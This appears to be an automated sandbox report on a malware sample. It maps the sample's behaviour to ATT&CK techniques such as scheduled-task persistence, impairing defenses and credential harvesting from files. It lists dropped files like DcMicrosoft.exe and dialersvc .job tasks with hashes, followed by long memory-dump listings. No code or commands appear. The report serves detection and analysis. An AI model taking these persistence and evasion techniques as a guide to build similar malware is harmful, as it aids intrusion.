MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\DcMicrosoft.exe
Filesize
7.0MB

MD5
d7d4f6bee8d6459aa9d6eef2318ed8dd

SHA1
600cddcfdd7f8ba4b68b37d1090f8dd768b6469a

SHA256
56f0724b9d3673f24c0ff64fde1ffaa980818d0f47c8a5e47d8a7713a9cabeaa

SHA512
c053b89e2d18cdd37334c390dc1b2b3d082c6327d3fc5512ac52cfc4cc5eefb08b133877d44f609e0b17608294d3753e217ce65964a5cc33c293a45fe6e14593

Download Submit
C:\DcMicrosoft.exe
Filesize
7.0MB

MD5
d7d4f6bee8d6459aa9d6eef2318ed8dd

SHA1
600cddcfdd7f8ba4b68b37d1090f8dd768b6469a

SHA256
56f0724b9d3673f24c0ff64fde1ffaa980818d0f47c8a5e47d8a7713a9cabeaa

SHA512
c053b89e2d18cdd37334c390dc1b2b3d082c6327d3fc5512ac52cfc4cc5eefb08b133877d44f609e0b17608294d3753e217ce65964a5cc33c293a45fe6e14593

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
Filesize
4.5MB

MD5
535d450486505acb3ee1e71351bcf010

SHA1
755b77cdc3e288f295b70c45006aac256e9c0c76

SHA256
bca2056a747263e5bb2475ef321a08860313ae38af43ed8ea8a01652c6039fa5

SHA512
afbcc085a008010159273ec295e39b297c4f857b3bd2e231bd06df40dcd7e6f80ef3ed5190342ca9d04327d53e185fccad4e1c3cf573054746f32f91c98ea328

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
Filesize
4.5MB

MD5
535d450486505acb3ee1e71351bcf010

SHA1
755b77cdc3e288f295b70c45006aac256e9c0c76

SHA256
bca2056a747263e5bb2475ef321a08860313ae38af43ed8ea8a01652c6039fa5

SHA512
afbcc085a008010159273ec295e39b297c4f857b3bd2e231bd06df40dcd7e6f80ef3ed5190342ca9d04327d53e185fccad4e1c3cf573054746f32f91c98ea328

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe
Filesize
2.3MB

MD5
09e7df1b7af441df97311eb490cf6253

SHA1
71542eba588e5500118a46e6918f6b19f9e69b66

SHA256
595142ac0ecaf32e5cd9a477f440bac99b52dcc6c2fa083424d5007fdf0caeec

SHA512
3ffa81253d97ba5317385fbe635038f81ef6b7f50d17c5ab868efb194d0185cc8bc0e2a4ceb576705bc0c9a066df54f7c0ac18ea332f1aa93a51c60fa9d353aa

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
d725466e55f1963f578d5e294a82ae6d

SHA1
3e8d467bf9a9a18cff34ed46c33619555fef98a9

SHA256
04d9ab7f3c3e543ff0b14f3f900c21b0a46d9c12cfd667c28e5d65578a47cec3

SHA512
cc040874aeb393e7ca3a9300c03f08389ebd5ef0875f770c851617c2e2abdba480eb9fac0989ad930d2d27e36770db48d4a580a6322bdd98910212b2f160d9e9

Download Submit
C:\Windows\Tasks\dialersvc64.job
Filesize
1KB

MD5
1d9525c414a1abb42d4320c2ce1812c6

SHA1
50aa0a61ca055d672cc37e6378ccead8113be570

SHA256
b9684a44909f0653191a697128d8bda6f66701b8ac6ce6ff26c0ce15ede35938

SHA512
91a72f68371efe58b0542338e943604d56bb7b8d7ca69a07af07e94bc770a65e026ab7878851ca47ecc896bad252c1bbe41851aafd92998468f6a37a0e880fc3

Download Submit
C:\builder.bat
Filesize
87B

MD5
400aff914f5fd3b04102a90194d2f807

SHA1
7c61e429bafe0028c7255bc28424872ea9f2fc45

SHA256
c58daf681cdf2300a25c95ee7b2962bd92dfc1860a7dac8dc78a81df6f5641b2

SHA512
e27fa92a67dcd4e836cf07b9db51f850b00ce445324e24bf0299258215d068c0204a85b2e6c529a3170740ed0368c6673e25802caae651c612ab989730c4b823

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
Filesize
4.5MB

MD5
535d450486505acb3ee1e71351bcf010

SHA1
755b77cdc3e288f295b70c45006aac256e9c0c76

SHA256
bca2056a747263e5bb2475ef321a08860313ae38af43ed8ea8a01652c6039fa5

SHA512
afbcc085a008010159273ec295e39b297c4f857b3bd2e231bd06df40dcd7e6f80ef3ed5190342ca9d04327d53e185fccad4e1c3cf573054746f32f91c98ea328

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe
Filesize
2.3MB

MD5
09e7df1b7af441df97311eb490cf6253

SHA1
71542eba588e5500118a46e6918f6b19f9e69b66

SHA256
595142ac0ecaf32e5cd9a477f440bac99b52dcc6c2fa083424d5007fdf0caeec

SHA512
3ffa81253d97ba5317385fbe635038f81ef6b7f50d17c5ab868efb194d0185cc8bc0e2a4ceb576705bc0c9a066df54f7c0ac18ea332f1aa93a51c60fa9d353aa

Download Submit
memory/240-55-0x0000000000000000-mapping.dmp

Download
memory/268-81-0x0000000000000000-mapping.dmp

Download
memory/272-245-0x0000000001C20000-0x0000000001C4A000-memory.dmp

Filesize
168KB

Download
memory/272-248-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/308-54-0x0000000075591000-0x0000000075593000-memory.dmp

Filesize
8KB

Download
memory/316-118-0x0000000000000000-mapping.dmp

Download
memory/340-241-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/340-236-0x0000000000980000-0x00000000009AA000-memory.dmp

Filesize
168KB

Download
memory/416-191-0x0000000000770000-0x000000000079A000-memory.dmp

Filesize
168KB

Download
memory/416-190-0x0000000000180000-0x00000000001A3000-memory.dmp

Filesize
140KB

Download
memory/416-156-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/416-155-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/416-152-0x0000000000180000-0x00000000001A3000-memory.dmp

Filesize
140KB

Download
memory/464-199-0x00000000009A0000-0x00000000009CA000-memory.dmp

Filesize
168KB

Download
memory/464-159-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/464-293-0x00000000009A0000-0x00000000009CA000-memory.dmp

Filesize
168KB

Download
memory/464-158-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/472-164-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/472-202-0x0000000000130000-0x000000000015A000-memory.dmp

Filesize
168KB

Download
memory/472-163-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/484-169-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/484-167-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/484-205-0x0000000000470000-0x000000000049A000-memory.dmp

Filesize
168KB

Download
memory/484-294-0x0000000000470000-0x000000000049A000-memory.dmp

Filesize
168KB

Download
memory/572-86-0x0000000000000000-mapping.dmp

Download
memory/596-214-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/596-211-0x0000000000450000-0x000000000047A000-memory.dmp

Filesize
168KB

Download
memory/596-178-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/596-295-0x0000000000450000-0x000000000047A000-memory.dmp

Filesize
168KB

Download
memory/632-134-0x0000000000000000-mapping.dmp

Download
memory/632-284-0x00000000779E0000-0x0000000077B60000-memory.dmp

Filesize
1.5MB

Download
memory/632-280-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/632-141-0x0000000074440000-0x00000000749EB000-memory.dmp

Filesize
5.7MB

Download
memory/672-181-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/672-217-0x0000000000630000-0x000000000065A000-memory.dmp

Filesize
168KB

Download
memory/672-296-0x0000000000630000-0x000000000065A000-memory.dmp

Filesize
168KB

Download
memory/672-180-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/684-84-0x0000000000000000-mapping.dmp

Download
memory/748-91-0x0000000000000000-mapping.dmp

Download
memory/748-126-0x0000000000000000-mapping.dmp

Download
memory/756-220-0x00000000007A0000-0x00000000007CA000-memory.dmp

Filesize
168KB

Download
memory/756-182-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/756-183-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/804-179-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/804-177-0x000007FEBF7B0000-0x000007FEBF7C0000-memory.dmp

Filesize
64KB

Download
memory/804-208-0x00000000008E0000-0x000000000090A000-memory.dmp

Filesize
168KB

Download
memory/840-223-0x0000000000800000-0x000000000082A000-memory.dmp

Filesize
168KB

Download
memory/840-297-0x0000000000800000-0x000000000082A000-memory.dmp

Filesize
168KB

Download
memory/848-82-0x0000000000000000-mapping.dmp

Download
memory/868-226-0x0000000000970000-0x000000000099A000-memory.dmp

Filesize
168KB

Download
memory/868-233-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/928-130-0x0000000000000000-mapping.dmp

Download
memory/956-117-0x0000000000000000-mapping.dmp

Download
memory/960-276-0x00000000004039E0-mapping.dmp

Download
memory/960-286-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/960-290-0x00000000779E0000-0x0000000077B60000-memory.dmp

Filesize
1.5MB

Download
memory/960-291-0x0000000000070000-0x000000000008B000-memory.dmp

Filesize
108KB

Download
memory/960-292-0x00000000005D0000-0x00000000005F1000-memory.dmp

Filesize
132KB

Download
memory/976-119-0x0000000000000000-mapping.dmp

Download
memory/984-140-0x0000000000E10000-0x0000000000E90000-memory.dmp

Filesize
512KB

Download
memory/984-143-0x00000000775E0000-0x00000000776FF000-memory.dmp

Filesize
1.1MB

Download
memory/984-133-0x0000000000000000-mapping.dmp

Download
memory/984-151-0x00000000775E0000-0x00000000776FF000-memory.dmp

Filesize
1.1MB

Download
memory/984-137-0x000007FEF4590000-0x000007FEF4FB3000-memory.dmp

Filesize
10.1MB

Download
memory/984-149-0x0000000077800000-0x00000000779A9000-memory.dmp

Filesize
1.7MB

Download
memory/984-139-0x000007FEF3A30000-0x000007FEF458D000-memory.dmp

Filesize
11.4MB

Download
memory/984-142-0x0000000077800000-0x00000000779A9000-memory.dmp

Filesize
1.7MB

Download
memory/1032-250-0x0000000000870000-0x000000000089A000-memory.dmp

Filesize
168KB

Download
memory/1032-252-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1064-64-0x0000000003A40000-0x000000000419A000-memory.dmp

Filesize
7.4MB

Download
memory/1064-58-0x0000000000000000-mapping.dmp

Download
memory/1064-99-0x0000000003A40000-0x000000000419A000-memory.dmp

Filesize
7.4MB

Download
memory/1068-87-0x0000000000000000-mapping.dmp

Download
memory/1076-78-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1076-77-0x000007FEED940000-0x000007FEEE49D000-memory.dmp

Filesize
11.4MB

Download
memory/1076-80-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1076-79-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1076-74-0x0000000000000000-mapping.dmp

Download
memory/1076-76-0x000007FEEE4A0000-0x000007FEEEEC3000-memory.dmp

Filesize
10.1MB

Download
memory/1088-131-0x0000000000000000-mapping.dmp

Download
memory/1148-269-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1148-268-0x0000000000A60000-0x0000000000A8A000-memory.dmp

Filesize
168KB

Download
memory/1164-123-0x0000000000000000-mapping.dmp

Download
memory/1164-88-0x0000000000000000-mapping.dmp

Download
memory/1168-90-0x0000000000000000-mapping.dmp

Download
memory/1168-127-0x0000000000000000-mapping.dmp

Download
memory/1228-287-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1228-267-0x0000000000270000-0x000000000029A000-memory.dmp

Filesize
168KB

Download
memory/1300-257-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1300-254-0x0000000001D90000-0x0000000001DBA000-memory.dmp

Filesize
168KB

Download
memory/1368-68-0x0000000000000000-mapping.dmp

Download
memory/1368-100-0x00000000007A0000-0x00000000007A6000-memory.dmp

Filesize
24KB

Download
memory/1368-73-0x000007FEFC081000-0x000007FEFC083000-memory.dmp

Filesize
8KB

Download
memory/1368-72-0x000000001BF10000-0x000000001C374000-memory.dmp

Filesize
4.4MB

Download
memory/1368-71-0x000000013F930000-0x000000013FDB4000-memory.dmp

Filesize
4.5MB

Download
memory/1392-260-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1392-259-0x0000000001C10000-0x0000000001C3A000-memory.dmp

Filesize
168KB

Download
memory/1428-261-0x0000000003EA0000-0x0000000003ECA000-memory.dmp

Filesize
168KB

Download
memory/1428-262-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1484-120-0x0000000000000000-mapping.dmp

Download
memory/1524-92-0x0000000000000000-mapping.dmp

Download
memory/1548-83-0x0000000000000000-mapping.dmp

Download
memory/1552-122-0x0000000000000000-mapping.dmp

Download
memory/1556-264-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1556-263-0x0000000000120000-0x000000000014A000-memory.dmp

Filesize
168KB

Download
memory/1588-96-0x0000000000000000-mapping.dmp

Download
memory/1596-266-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1596-265-0x0000000000390000-0x00000000003BA000-memory.dmp

Filesize
168KB

Download
memory/1612-128-0x0000000000000000-mapping.dmp

Download
memory/1616-94-0x0000000000000000-mapping.dmp

Download
memory/1624-89-0x0000000000000000-mapping.dmp

Download
memory/1660-125-0x0000000000000000-mapping.dmp

Download
memory/1700-95-0x0000000000000000-mapping.dmp

Download
memory/1704-129-0x0000000000000000-mapping.dmp

Download
memory/1728-93-0x0000000000000000-mapping.dmp

Download
memory/1732-132-0x0000000000000000-mapping.dmp

Download
memory/1772-108-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-115-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-107-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-121-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-109-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-104-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-101-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-102-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-113-0x0000000140001844-mapping.dmp

Download
memory/1772-111-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1772-112-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1812-85-0x0000000000000000-mapping.dmp

Download
memory/1904-65-0x000000013F340000-0x000000013FA9A000-memory.dmp

Filesize
7.4MB

Download
memory/1904-62-0x0000000000000000-mapping.dmp

Download
memory/1904-66-0x000000013F340000-0x000000013FA9A000-memory.dmp

Filesize
7.4MB

Download
memory/1952-98-0x0000000000000000-mapping.dmp

Download
memory/1956-288-0x00000000001C0000-0x00000000001EA000-memory.dmp

Filesize
168KB

Download
memory/1956-289-0x0000000037840000-0x0000000037850000-memory.dmp

Filesize
64KB

Download
memory/1972-124-0x0000000000000000-mapping.dmp

Download
memory/1996-97-0x0000000000000000-mapping.dmp

Download
memory/2008-147-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2008-148-0x0000000077800000-0x00000000779A9000-memory.dmp

Filesize
1.7MB

Download
memory/2008-145-0x00000001400033F4-mapping.dmp

Download
memory/2008-144-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2008-150-0x00000000775E0000-0x00000000776FF000-memory.dmp

Filesize
1.1MB

Download
memory/2008-193-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/2008-270-0x0000000000210000-0x000000000023A000-memory.dmp

Filesize
168KB

Download
memory/2008-196-0x0000000077800000-0x00000000779A9000-memory.dmp

Filesize
1.7MB

Download